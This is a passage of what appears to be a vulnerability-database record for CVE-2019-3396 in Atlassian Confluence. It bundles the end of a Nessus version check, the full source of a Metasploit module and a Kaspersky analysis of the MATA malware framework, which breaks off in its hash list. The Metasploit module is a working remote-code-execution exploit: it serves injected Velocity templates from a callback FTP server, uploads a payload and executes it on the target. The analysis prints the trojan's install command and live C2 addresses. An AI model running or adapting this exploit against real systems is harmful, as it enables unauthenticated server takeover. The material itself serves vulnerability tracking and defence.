Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123008);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/01\");\n\n script_cve_id(\"CVE-2019-3395\", \"CVE-2019-3396\");\n script_bugtraq_id(107543);\n script_xref(name:\"IAVA\", value:\"2019-A-0135-S\");\n\n script_name(english:\"Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Atlassian Confluence version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian\nConfluence application running on the remote host is prior to 6.6.12,\n6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 6.14.x prior to\n6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the\n WebDAV plugin due to improper input validation. An\n attacker can exploit this, via unspecified vectors, to\n send arbitrary HTTP and WebDAV requests from the\n application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget\n Connector due to improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. (CVE-2019-3396)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8e8304c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.6.12, 6.12.3, 6.13.3,\n6.14.2, 6.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-3396\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Confluence File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Widget Connector Macro Velocity Template Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/22\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp_name = \"confluence\";\n\nport = get_http_port(default:80);\n\napp_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"fixed_version\": \"6.6.12\" },\n {\"min_version\": \"6.7.0\", \"fixed_version\": \"6.12.3\", \"fixed_display\": \"6.12.3 / 6.15.1\"},\n {\"min_version\": \"6.13.0\", \"fixed_version\": \"6.13.3\", \"fixed_display\": \"6.13.3 / 6.15.1\" },\n {\"min_version\": \"6.14.0\", \"fixed_version\": \"6.14.2\", \"fixed_display\": \"6.14.2 / 6.15.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-15T08:21:21", "description": "Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is unrequired to exploit this vulnerability. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. This vulnerability was originally discovered by Daniil Dmitriev https://twitter.com/ddv_ua.\n", "published": "2019-04-11T12:55:51", "type": "metasploit", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/CONFLUENCE_WIDGET_CONNECTOR", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::FtpServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\",\n 'Description' => %q{\n Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\n allows embed online videos, slideshows, photostreams and more directly into page.\n A _template parameter can be used to inject remote Java code into a Velocity template,\n and gain code execution. Authentication is unrequired to exploit this vulnerability.\n By default, Java payload will be used because it is cross-platform, but you can also\n specify which native payload you want (Linux or Windows).\n\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\n\n This vulnerability was originally discovered by Daniil Dmitriev\n https://twitter.com/ddv_ua.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniil Dmitriev', # Discovering vulnerability\n 'Dmitry (rrock) Shchannikov' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2019-3396' ],\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-%E3%80%90CVE-2019-3396%E3%80%91-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\n [ 'URL', 'https://paper.seebug.org/886/']\n ],\n 'Targets' =>\n [\n [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8090,\n 'SRVPORT' => 8021,\n },\n 'Privileged' => false,\n 'DisclosureDate' => '2019-03-25',\n 'DefaultTarget' => 0,\n 'Stance' => Msf::Exploit::Stance::Aggressive\n ))\n\n register_options(\n [\n OptAddress.new('SRVHOST', [true, 'Callback address for template loading']),\n OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),\n OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',\n 'https://www.youtube.com/watch?v=kxopViU98Xo'])\n ])\n end\n\n # Handles ftp RETP command.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] RETR argument.\n # @return [void]\n def on_client_command_retr(c, arg)\n vprint_status(\"FTP download request for #{arg}\")\n conn = establish_data_connection(c)\n if(not conn)\n c.put(\"425 Can't build data connection\\r\\n\")\n return\n end\n\n c.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\n case arg\n when /check\\.vm$/\n conn.put(wrap(get_check_vm))\n when /javaprop\\.vm$/\n conn.put(wrap(get_javaprop_vm))\n when /upload\\.vm$/\n conn.put(wrap(get_upload_vm))\n when /exec\\.vm$/\n conn.put(wrap(get_exec_vm))\n else\n conn.put(wrap(get_dummy_vm))\n end\n c.put(\"226 Transfer complete.\\r\\n\")\n conn.close\n end\n\n # Handles ftp PASS command to suppress output.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] PASS argument.\n # @return [void]\n def on_client_command_pass(c, arg)\n @state[c][:pass] = arg\n vprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\")\n c.put \"230 Login OK\\r\\n\"\n end\n\n # Handles ftp EPSV command to suppress output.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] EPSV argument.\n # @return [void]\n def on_client_command_epsv(c, arg)\n vprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\")\n c.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\n end\n\n # Returns a upload template.\n #\n # @return [String]\n def get_upload_vm\n (\n <<~EOF\n $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\n EOF\n )\n end\n\n # Returns a command execution template.\n #\n # @return [String]\n def get_exec_vm\n (\n <<~EOF\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\n EOF\n )\n end\n\n # Returns checking template.\n #\n # @return [String]\n def get_check_vm\n (\n <<~EOF\n #{@check_text}\n EOF\n )\n end\n\n # Returns Java's getting property template.\n #\n # @return [String]\n def get_javaprop_vm\n (\n <<~EOF\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\n EOF\n )\n end\n\n # Returns dummy template.\n #\n # @return [String]\n def get_dummy_vm\n (\n <<~EOF\n EOF\n )\n end\n\n # Checks the vulnerability.\n #\n # @return [Array] Check code\n def check\n checkcode = Exploit::CheckCode::Safe\n begin\n # Start the FTP service\n print_status(\"Starting the FTP server.\")\n start_service\n\n @check_text = Rex::Text.rand_text_alpha(5..10)\n res = inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\n if res && res.body && res.body.include?(@check_text)\n checkcode = Exploit::CheckCode::Vulnerable\n end\n rescue Msf::Exploit::Failed => e\n vprint_error(e.message)\n checkcode = Exploit::CheckCode::Unknown\n end\n checkcode\n end\n\n # Injects Java code to the template.\n #\n # @param service_url [String] Address of template to injection.\n # @return [void]\n def inject_template(service_url, timeout=20)\n\n uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'headers' => {\n 'Accept' => '*/*',\n 'Origin' => full_uri(vhost_uri: true)\n },\n 'ctype' => 'application/json; charset=UTF-8',\n 'data' => {\n 'contentId' => '1',\n 'macro' => {\n 'name' => 'widget',\n 'body' => '',\n 'params' => {\n 'url' => datastore['TRIGGERURL'],\n '_template' => service_url\n }\n\n }\n }.to_json\n }, timeout=timeout)\n\n unless res\n unless service_url.include?(\"exec.vm\")\n print_warning('Connection timed out in #inject_template')\n end\n return\n end\n\n if res.body.include? 'widget-error'\n print_error('Failed to inject and execute code:')\n else\n vprint_status(\"Server response:\")\n end\n\n vprint_line(res.body)\n\n res\n end\n\n # Returns a system property for Java.\n #\n # @param prop [String] Name of the property to retrieve.\n # @return [String]\n def get_java_property(prop)\n @prop = prop\n res = inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\n if res && res.body\n return clear_response(res.body)\n end\n ''\n end\n\n # Returns the target platform.\n #\n # @return [String]\n def get_target_platform\n return get_java_property('os.name')\n end\n\n # Checks if the target os/platform is compatible with the module target or not.\n #\n # @return [TrueClass] Compatible\n # @return [FalseClass] Not compatible\n def target_platform_compat?(target_platform)\n target.platform.names.each do |n|\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\n return true\n end\n end\n\n false\n end\n\n # Returns a temp path from the remote target.\n #\n # @return [String]\n def get_tmp_path\n return get_java_property('java.io.tmpdir')\n end\n\n # Returns the Java home path used by Confluence.\n #\n # @return [String]\n def get_java_home_path\n return get_java_property('java.home')\n end\n\n # Returns Java code that can be used to inject to the template in order to copy a file.\n #\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\n # It is meant to be used with #get_write_file_code.\n #\n # @param fname [String] The file to copy\n # @param new_fname [String] The new file\n # @return [void]\n def get_dup_file_code(fname, new_fname)\n if fname =~ /^\\/[[:print:]]+/\n @command = \"cp #{fname} #{new_fname}\"\n else\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\n end\n\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n end\n\n # Returns the normalized file path for payload.\n #\n # @return [String]\n def normalize_payload_fname(tmp_path, fname)\n # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.\n if /^\\/[[:print:]]+/ === tmp_path\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\n else\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\n end\n end\n\n # Exploits the target in Java platform.\n #\n # @return [void]\n def exploit_as_java\n\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\n @command = ''\n\n java_home = get_java_home_path\n\n if java_home.blank?\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\n else\n vprint_status(\"Found Java home path: #{java_home}\")\n end\n\n register_files_for_cleanup(@fname)\n\n if /^\\/[[:print:]]+/ === @fname\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\n @command = %Q|#{normalized_java_path} -jar #{@fname}|\n else\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n @command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}|\n end\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to execute #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n\n # Exploits the target in Windows platform.\n #\n # @return [void]\n def exploit_as_windows\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\n new_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n\n # Exploits the target in Linux platform.\n #\n # @return [void]\n def exploit_as_linux\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n @command = \"chmod +x #{@fname}\"\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n def exploit\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\n\n # Start the FTP service\n print_status(\"Starting the FTP server.\")\n start_service\n\n target_platform = get_target_platform\n if target_platform.empty?\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".')\n else\n print_status(\"Target being detected as: #{target_platform}\")\n end\n\n unless target_platform_compat?(target_platform)\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\n end\n\n case target.name.downcase\n when /java$/\n exploit_as_java\n when /windows$/\n exploit_as_windows\n when /linux$/\n exploit_as_linux\n end\n end\n\n # Wraps request.\n #\n # @return [String]\n def wrap(string)\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\n end\n\n # Returns unwrapped response.\n #\n # @return [String]\n def clear_response(string)\n if match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)\n return match.captures[0]\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/confluence_widget_connector.rb"}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2019-3396"], "description": "\n\nAs the IT and OT environment becomes more complex, adversaries are quick to adapt their attack strategy. For example, as users&#x27; work environments diversify, adversaries are busy acquiring the TTPs to infiltrate systems. Recently, we reported to our Threat Intelligence Portal customers a similar malware framework that internally we called MATA. The MATA malware framework possesses several components, such as loader, orchestrator and plugins. This comprehensive framework is able to target Windows, Linux and macOS operating systems.\n\nThe first artefacts we found relating to MATA were used around April 2018. After that, the actor behind this advanced malware framework used it aggressively to infiltrate corporate entities around the world. We identified several victims from our telemetry and figured out the purpose of this malware framework.\n\n## Windows version of MATA\n\nThe Windows version of MATA consists of several components. According to our telemetry, the actor used a loader malware to load the encrypted next-stage payload. We&#x27;re not sure that the loaded payload is the orchestrator malware, but almost all victims have the loader and orchestrator on the same machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08145951/sl_mata_01.png>)\n\n**_Component of the Windows version of MATA_**\n\n### Loader\n\nThis loader takes a hardcoded hex-string, converts it to binary and AES-decrypts it in order to obtain the path to the payload file. Each loader has a hard-coded path to load the encrypted payload. The payload file is then AES-decrypted and loaded.\n\nFrom the loader malware found on one of the compromised victims, we discovered that the parent process which executes the loader malware is the &quot;C:\\Windows\\System32\\wbem\\WmiPrvSE.exe&quot; process. The WmiPrvSE.exe process is &quot;WMI Provider Host process&quot;, and it usually means the actor has executed this loader malware from a remote host to move laterally. Therefore, we assess that the actor used this loader to compromise additional hosts in the same network.\n\n### Orchestrator and plugins\n\nWe discovered the orchestrator malware in the lsass.exe process on victims&#x27; machines. This orchestrator malware loads encrypted configuration data from a registry key and decrypts it with the AES algorithm. Unless the registry value exists, the malware uses hard-coded configuration data. The following is a configuration value example from one orchestrator malware sample:\n\n**Victim ID** | Random 24-bit number \n---|--- \n**Internal version number** | 3.1.1 (0x030101) \n**Timeout** | 20 minutes \n**C2 addresses** | 108.170.31[.]81:443\n\n192.210.239[.]122:443\n\n111.90.146[.]105:443 \n**Disk path or URL of plugin (up to 15) to be loaded on start** | Not used in this malware \n \nThe orchestrator can load 15 plugins at the same time. There are three ways to load them:\n\n * Download the plugin from the specified HTTP or HTTPS server\n * Load the AES-encrypted plugin file from a specified disk path\n * Download the plugin file from the current MataNet connection\n\nThe malware authors call their infrastructure MataNet. For covert communication, they employ TLS1.2 connections with the help of the &quot;openssl-1.1.0f&quot; open source library, which is statically linked inside this module. Additionally, the traffic between MataNet nodes is encrypted with a random RC4 session key. MataNet implements both client and server mode. In server mode the certificate file &quot;c_2910.cls&quot; and the private key file &quot;k_3872.cls&quot; are loaded for TLS encryption. However, this mode is never used.\n\nThe MataNet client establishes periodic connections with its C2. Every message has a 12-byte-long header, where the first DWORD is the message ID and the rest is the auxiliary data, as described in the table below:\n\n**Message ID** | **Description** \n---|--- \n0x400 | Complete the current MataNet session and delay the next session until the number of logical drives is changed or a new active user session is started. \n0x500 | Delete configuration registry key and stop MATA execution until next reboot. \n0x601 | Send configuration data to C2. \n0x602 | Download and set new configuration data. \n0x700 | Send the C2 the infected host basic information such as victim ID, internal version number, Windows version, computer name, user name, IP address and MAC address. \n0x701 | Send the C2 the configuration settings such as victim ID, internal version number and session timeout. \n \nThe main functionality of the orchestrator is loading each plugin file and executing them in memory. Each DLL file type plugin provides an interface for the orchestrator and provides rich functionality that can control infected machines.\n\n**Plugin name** | **Description** \n---|--- \nMATA_Plug_Cmd.dll | Run &quot;cmd.exe /c&quot; or &quot;powershell.exe&quot; with the specified parameters, and receive the output of the command execution. \nMATA_Plug_Process.dll | Manipulate process (listing process, killing process, creating process, creating process with logged-on user session ID). \nMATA_Plug_TestConnect.dll | Check TCP connection with given IP:port or IP range.\n\nPing given host or IP range. \nMATA_Plug_WebProxy.dll | Create a HTTP proxy server. The server listens for incoming TCP connections on the specified port, processing CONNECT requests from clients to the HTTP server and forwarding all traffic between client and server. \nMATA_Plug_File.dll | Manipulate files (write received data to given file, send given file after LZNT1 compression, compress given folder to %TEMP%\\~DESKTOP[8random hex].ZIP and send, wipe given file, search file, list file and folder, timestomping file). \nMATA_Plug_Load.dll | Inject DLL file into the given process using PID and process name, or inject XORed DLL file into given process, optionally call export function with arguments. \nMATA_Plug_P2PReverse.dll | Connect between MataNet server on one side and an arbitrary TCP server on the other, then forward traffic between them. IPs and ports for both sides are specified on the call to this interface. \n \nThere is an interesting string inside the MATA_Plug_WebProxy plugin \u2013 &quot;Proxy-agent: _matt-dot-net_&quot; \u2013 which is a reference to Matt McKnight&#x27;s [open source project](<https://www.codeproject.com/Articles/93301/Implementing-a-Multithreaded-HTTP-HTTPS-Debugging>). There are some differences though. Matt&#x27;s project is written in C# rather than C++. The MATA proxy is noticeably simpler, as there is no cache and no SSL support, for instance. It&#x27;s possible that MATA&#x27;s authors found and used the source code of an early version of Matt&#x27;s proxy server. It looks like the malware author rewrote the code from C# to C++ but left this footprint unchanged.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150311/sl_mata_02.png>)\n\n**_Proxy-agent of MATA_Plug_WebProxy.dll plugin_**\n\n## Non-Windows version of MATA\n\nThe MATA framework targets not only the Windows system but also Linux and macOS systems.\n\n### Linux version\n\nDuring our research, we also found a package containing different MATA files together with a set of hacking tools. In this case, the package was found on a legitimate distribution site, which might indicate that this is the way the malware was distributed. It included a Windows MATA orchestrator, a Linux tool for listing folders, scripts for exploiting Atlassian Confluence Server (CVE-2019-3396), a legitimate [socat tool](<http://www.dest-unreach.org/socat>) and a Linux version of the MATA orchestrator bundled together with a set of plugins. China-based security vendor Netlab also [published](<https://blog.netlab.360.com/dacls-the-dual-platform-rat-en/>) a highly detailed blog on this malware.\n\nThe module is designed to run as a daemon. Upon launch, the module checks if it is already running by reading the PID from &quot;/var/run/init.pid&quot; and checks if the &quot;/proc/%pid%/cmdline&quot; file content is equal to &quot;/flash/bin/mountd&quot;. Note that &quot;/flash/bin/mountd&quot; is an unusual path for standard Linux desktop or server installations. This path suggests that MATA&#x27;s Linux targets are diskless network devices such as routers, firewalls or IoT devices based on x86_64. The module can be run with the &quot;/pro&quot; switch to skip the &quot;init.pid&quot; check. The AES-encrypted configuration is stored in the &quot;$HOME/.memcache&quot; file. The behavior of this module is the same as the Windows MATA orchestrator previously described. The plugin names of Linux MATA and the corresponding Windows plugins are:\n\n**Linux plugin** | **Corresponding Windows plugin** \n---|--- \n/bin/bash | MATA_Plug_Cmd \nplugin_file | MATA_Plug_File \nplugin_process | MATA_Plug_Process \nplugin_test | MATA_Plug_TestConnect \nplugin_reverse_p2p | MATA_Plug_P2PReverse \n \nNote that the Linux version of MATA has a _logsend_ plugin. This plugin implements an interesting new feature, a &quot;scan&quot; command that tries to establish a TCP connection on ports 8291 (used for administration of MikroTik RouterOS devices) and 8292 (&quot;Bloomberg Professional&quot; software) and random IP addresses excluding addresses belonging to private networks. Any successful connection is logged and sent to the C2. These logs might be used by attackers for target selection.\n\n### macOS version\n\nWe discovered another MATA malware target for macOS uploaded to VirusTotal on April 8, 2020. The malicious Apple Disk Image file is a Trojanized macOS application based on an open-source two-factor authentication application named [MinaOTP](<https://github.com/MinaOTP/MinaOTP-MAC>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150419/sl_mata_03.png>)\n\n**_Trojanized macOS application_**\n\nThe Trojanized main TinkaOTP module is responsible for moving the malicious Mach-O file to the Library folder and executing it using the following command: \ncp TinkaOTP.app/Contents/Resources/Base.lproj/**SubMenu.nib** ~/Library/.mina &gt; /dev/null 2&gt;&amp;1 &amp;&amp; chmod +x ~/Library/.mina &gt; /dev/null 2&gt;&amp;1 &amp;&amp; ~/Library/.mina &gt; /dev/null 2&gt;&amp;1\n\nUpon launch, this malicious Mach-o file loads the initial configuration file from &quot;/Library/Caches/com.apple.appstotore.db&quot;.\n\nLike another strain running on a different platform, the macOS MATA malware also runs on a plugin basis. Its plugin list is almost identical to the Linux version, except that it also contains a plugin named &quot;plugin_socks&quot;. The &quot;plugin_socks&quot; plugin is similar to &quot;plugin_reverse_p2p&quot; and is responsible for configuring proxy servers.\n\n## Victims\n\nBased on our telemetry, we have been able to identify several victims who were infected by the MATA framework. The infection is not restricted to a specific territory. Victims were recorded in Poland, Germany, Turkey, Korea, Japan and India. Moreover, the actor compromised systems in various industries, including a software development company, an e-commerce company and an internet service provider.\n\nWe assess that MATA was used by an APT actor, and from one victim we identified one of their intentions. After deploying MATA malware and its plugins, the actor attempted to find the victim&#x27;s databases and execute several database queries to acquire customer lists. We&#x27;re not sure if they completed the exfiltration of the customer database, but it&#x27;s certain that customer databases from victims are one of their interests. In addition, MATA was used to distribute VHD ransomware to one victim, something that will be described in detail in an upcoming blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150538/sl_mata_04.png>)\n\n**_Victims of MATA_**\n\n## Attribution\n\nWe assess that the MATA framework is linked to the Lazarus APT group. The MATA orchestrator uses two unique filenames, c_2910.cls and k_3872.cls, which have only previously been seen in several Manuscrypt variants, including the samples (0137f688436c468d43b3e50878ec1a1f) [mentioned](<https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF>) in the US-CERT publication.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150700/sl_mata_05.png>)\n\n**_Unique file name_**\n\nMoreover, MATA uses global configuration data including a randomly generated session ID, date-based version information, a sleep interval and multiple C2s and C2 server addresses. We&#x27;ve seen that one of the Manuscrypt variants (ab09f6a249ca88d1a036eee7a02cdd16) shares a similar configuration structure with the MATA framework. This old Manuscrypt variant is an active backdoor that has similar configuration data such as session ID, sleep interval, number of C2 addresses, infected date, and C2 addresses. They are not identical, but they have a similar structure.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150744/sl_mata_06.png>)\n\n_**Manuscrypt configuration structure** _\n\n## Conclusion\n\nThe MATA framework is significant in that it is able to target multiple platforms: Windows, Linux and macOS. In addition, the actor behind this advanced malware framework utilized it for a type of cybercrime attack that steals customer databases and distributes ransomware. We evaluate that this malware is going to evolve, so we will be monitoring its activity in order to protect our customers.\n\nFor more information please contact: intelreports@kaspersky.com\n\n## Indicators of compromise\n\n### File Hashes (malicious documents, Trojans, emails, decoys)\n\n**Windows Loader**\n\nf364b46d8aafff67271d350b8271505a \n85dcea03016df4880cebee9a70de0c02 \n1060702fe4e670eda8c0433c5966feee \n7b068dfbea310962361abf4723332b3a \n8e665562b9e187585a3f32923cc1f889 \n6cd06403f36ad20a3492060c9dc14d80 \n71d8b4c4411f7ffa89919a3251e6e5cb \na7bda9b5c579254114fab05ec751918c \ne58cfbc6e0602681ff1841afadad4cc6 \n7e4e49d74b59cc9cc1471e33e50475d3 \na93d1d5c2cb9c728fda3a5beaf0a0ffc 